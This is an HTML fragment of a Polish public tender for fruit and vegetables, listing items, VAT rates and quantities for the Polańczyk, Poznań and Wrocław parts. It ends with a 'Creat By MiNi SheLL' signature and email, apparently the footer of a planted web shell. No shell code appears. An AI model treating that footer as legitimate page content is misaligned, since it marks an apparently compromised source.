90 40  Sałata zielona  Szt  5%  200 41  Seler  Kg  5%  40 42  Szczypior  Pęczek  5%  250 43  Śliwka typu renkloda  Kg  5%  25 44  Truskawka  Kg  5%  20 45  Winogrona  Kg  5%  75 46  Ziemniaki  Kg  5%  4 000 47  Ziemniaki młode  Kg  5%  900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4 Polańczyk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1  Arbuz  Kg  5%  100 2  Banan  Kg  8%  150 3  Brzoskwinia  Kg  5%  15 4  Buraki  Kg  5%  450 5  Cebula  Kg  5%  350 6  Cebula czerwona   Kg  5%  50 7  Cukinia  zielona   kg  5%  10 8  Cytryna  Kg  8%  270 9  Czosnek  szt  5%  47 10  Gruszka deserowa  Kg  5%  30 11  Jabłko deserowe  Gala, Champion  Kg  5%  540 12  Kalafior  Szt  5%  40 13  Kapusta biała   Kg  5%  330 14  Kapusta biała młoda  Szt  5%  130 15  Kapusta czerwona  Kg  5%  230 16  Kapusta kiszona wiaderko 3 i 5kg  Kg  8%   30 17  Kapusta pekińska  Kg  5%  370 18  Kiwi  Kg  8%  10 19  Koper zielony  Pęczek  5%  300 20  Mandarynka  Kg  8%  30 21  Marchew  Kg  5%  600 22  Nektarynka  Kg  5%  60 23  Ogórek świeży długi  Kg  5%  600 24  Ogórki kiszone wiaderko 3 i 5kg  Kg  8%  200 25  Papryka świeża czerwona, żółta  Kg  5%  150 26  Pieczarka świeża  Kg  5%  130 27  Pietruszka korzeń  Kg  5%  50 28  Pietruszka zielona  Pęczek  5%  260 29  Pomarańcza  Kg  8%  30 30  Pomidor  Kg  5%  1 000 31  Por  szt  5%  55 32  Rzodkiewka  Pęczek  5%  100 33   Sałata dekoracyjna (karbowane liście zielona  lub czerwona)   Szt   5%  480 34  Sałata lodowa  Szt  5%  70 35  Sałata zielona  Szt  5%  20 36  Seler  Kg  5%  310 37  Szczypior  Pęczek  5%  275 38  Śliwka typu renkloda  Kg  5%  20 39  Winogrona czarne  Kg  5%  30 40  Winogrona białe  Kg  5%  30 41  Ziemniaki  Kg  5%  3 000 42  Ziemniaki młode  Kg  5%  1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5 Poznań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1  Ananas   szt.  5%  50 2  Arbuz  Kg  5%  50 3  Bakłażan   kg  5%  50 4  Banan  Kg  8%  100 5  Botwina  Pęczek  5%  40 6  Brzoskwinia  Kg  5%  30 7  Buraki  Kg  5%  600 8  Cebula  Kg  5%  500 9  Cebula czerwona   Kg  5%  100 10  Cukinia  zielona   kg  5%  100 11  Cytryna  Kg  8%  200 12  Czosnek  Kg  5%  50 13  fasola szparagowa świeża żółta  kg  5%  20 14  Grapefruit  czerwony   kg  8%  40 15  Gruszka deserowa  Kg  5%  50 16  Jabłko deserowe  Gala, Champion  Kg  5%  100 17  Jagoda  kg  5%  20 18  Kalafior  Szt  5%  100 19  Kapusta biała   Kg  5%  1 500 20  Kapusta biała młoda  Szt  5%  200 21  Kapusta czerwona  Kg  5%  500 22  Kapusta kiszona wiaderko 3 i 5kg  Kg  8%  250 23  Kapusta pekińska  Kg  5%  100 24  Kiełki  lucerny  250 g  szt.  5%  100 25  Kiwi  Kg  8%  50 26  Koper zielony  Pęczek  5%  500 27  Malina  Kg  5%  20 28  Mandarynka  Kg  8%  50 29  Marchew  Kg  5%  400 30  Mięta świeża - doniczka  szt.  5%  200 31  Melon  szt.  5%  50 32  Nektarynka  Kg  5%  50 33  Ogórek świeży długi  Kg  5%  300 34  Ogórki kiszone wiaderko 3 i 5kg  Kg  8%  200 35  Ogórki gruntowe  Kg  5%  100 36  Ogórki małosolne  Kg  5%  50 37  Papryka świeża czerwona, żółta  Kg  5%  100 38  Pieczarka świeża  Kg  5%  200 39  Pietruszka korzeń  Kg  5%  100 40  Pietruszka zielona  Pęczek  5%  500 41  Pomarańcza  Kg  8%  20 42  Pomidor  Kg  5%  500 43  Pomidor cherry 250g  Kg  5%  100 44  Por  szt  5%  100 45  Rzodkiew biała  kg  5%  20 46  Rzodkiewka  Pęczek  5%  100 47   Sałata dekoracyjna  (karbowane liście zielona  lub czerwona)   Szt  5%  200 48  Sałata lodowa  Szt  5%  200 49  Sałata zielona  Szt  5%  200 50  Seler naciowy  Pęczek  5%  100  51  Seler  Kg  5%  100 52  Szczaw świeży  Pęczek  5%  50 53  Szczypior  Pęczek  5%  200 54  Śliwka typu renkloda  Kg  5%  50 55  Truskawka  Kg  5%  100 56  Winogrona czarne  Kg  5%  100 57  Winogrona białe  Kg  5%  100 58  Ziemniaki  Kg  5%  4 000 59  Ziemniaki młode  Kg  5%  500 60  bazylia - doniczka  szt  5%  200 61  Rozmaryn - doniczka  szt  5%  200 62  Brokuły  kg  5%  30 63  Szparagi   Kg  5%  10 64  Oregano - doniczka  Kg  5%  200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6 Wrocław.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Banan Kg 8% 15  2 Brzoskwinia Kg 5% 24 3 Cytryna Kg 8% 20 4 Gruszka deserowa Kg 5% 10 5 Jabłko deserowe  Gala, Champion Kg 5% 100 6 Kiełki  lucerny  250 g szt. 5% 20 7 Kiwi Kg 8% 10 8 Koper zielony Pęczek 5% 24 9 Mandarynka Kg 8% 15 10 Mięta świeża - doniczka szt. 5% 10 11 Nektarynka Kg 5% 10  12 Ogórek świeży długi Kg 5% 120 13 Ogórki kiszone wiaderko 3 i 5kg Kg 8% 20 14 Papryka świeża czerwona, żółta Kg 5% 15 15 Pietruszka zielona Pęczek 5% 15 16 Pomarańcza Kg 8% 25 17 Pomidor Kg 5% 200 18 Pomidor cherry 250g Kg 5% 7 19 Rzodkiewka Pęczek 5% 70 20 Sałata dekoracyjna  (karbowane liście zielona  lub czerwona) Szt 5% 15 21 Sałata lodowa Szt 5% 150 22 Szczypior Pęczek 5% 150 23 Truskawka Kg 5% 5 24 Winogrona czarne Kg 5% 12 25 Winogrona białe Kg 5% 15 26 Bazylia - doniczka szt 5% 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com